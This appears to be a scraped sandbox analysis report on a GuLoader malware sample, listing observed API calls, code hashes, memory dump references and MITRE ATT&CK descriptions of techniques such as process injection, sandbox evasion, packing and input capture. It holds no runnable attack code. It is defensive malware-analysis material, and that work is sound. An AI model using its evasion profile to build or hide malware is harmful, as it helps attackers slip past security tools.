Opcode Fuzzy Hash: 0e15e392d696656e7d89b817859a1c953d239c8a831175081876f6f9791be93e
Instruction Fuzzy Hash: 791102B21043014FE7109F74CA99F863F68FF56364F650290D996EB2B6C378D885CB25

Uniqueness

Uniqueness Score: -1.00%

Function 00569B22, Relevance: 1.6, APIs: 1, Instructions: 53nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00569BB4

Memory Dump Source

Source File: 0000000B.00000002.1726383083.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: bb95af03cc92a76782180eeba71ed0ce1408b78a67b4c5ff14e1612405556a19
Instruction ID: f2e2b0f4e5083176e8d91b93a929e0310e645c892ec62dfe317ed870ce3eda37
Opcode Fuzzy Hash: bb95af03cc92a76782180eeba71ed0ce1408b78a67b4c5ff14e1612405556a19
Instruction Fuzzy Hash: AD110EB11093419FE7149B34C999F463FA8BF56360B1502D1E996EB1B3C338D889CB26

Uniqueness

Uniqueness Score: -1.00%

Function 00569A3C, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(-99D36D22), ref: 00569AB1

Memory Dump Source

Source File: 0000000B.00000002.1726383083.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: a66082412740b23d928c8810313e52a32b307422dfaeb2fa8c010ecc194c957a
Instruction ID: 2ccec4a4e7d74d02940ec2368af412d6c8ef7135460a823907fe2a3f892de576
Opcode Fuzzy Hash: a66082412740b23d928c8810313e52a32b307422dfaeb2fa8c010ecc194c957a
Instruction Fuzzy Hash: 88F0E970A44388CFEF389F28CD897EE7BA1BF81384F418259CD845B144D3314645CB02

Uniqueness

Uniqueness Score: -1.00%

Function 00569BF8, Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?), ref: 00569C26

Memory Dump Source

Source File: 0000000B.00000002.1726383083.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b9cc8097702acce1339065a4e60332b9477f483d9788a1214a5ba4b35d80d80e
Instruction ID: fa58929289c613cbb740ad09e80b9ff1a3d1ea4ff922e27ed8d03e4a6651aa3f
Opcode Fuzzy Hash: b9cc8097702acce1339065a4e60332b9477f483d9788a1214a5ba4b35d80d80e
Instruction Fuzzy Hash: 06E0E6B41047418FE7547F64C68DB557BE5BF45761F458188E9141B1F387718841CA21

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report kGSHiWbgq9.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

Function 00401144, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
COMMON